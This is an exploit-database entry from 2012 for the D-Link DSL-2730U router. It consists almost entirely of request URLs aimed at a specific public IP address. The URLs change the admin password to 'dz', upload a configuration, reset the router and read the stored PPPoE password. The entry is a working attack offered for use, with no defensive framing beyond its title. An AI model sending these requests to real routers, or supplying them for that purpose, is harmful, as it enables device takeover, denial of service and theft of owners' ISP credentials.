id: 19482
date: 09/26/2012
title: D-Link DSL-2730U CSRF / Update config
author: The Black Devils
cves: 

# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Software Link: [ N / A ]
# Category : [ webapps ]
# Google dork: [ N / A ]
# Tested on: [Windows] & [Ubuntu]

-------------------------------
picture of the router 
https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-snc7/c0.0.843.403/p843x403/298397_499133010105525_1073213056_n.jpg



http://41.107.210.20/password.cgi?syspassword=dz

the new password is : dz

-------------------------------
picture of the router 
https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-snc7/c0.0.843.403/p843x403/298397_499133010105525_1073213056_n.jpg

upload config
http://41.107.210.20/upload.cgi

------
reset router
http://41.107.210.20/resetrouter.cgi

------


read pppoe password 
http://41.107.210.20/pppoe.cgi


-------------------------------


#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------



#  0day.today [2023-03-24]  #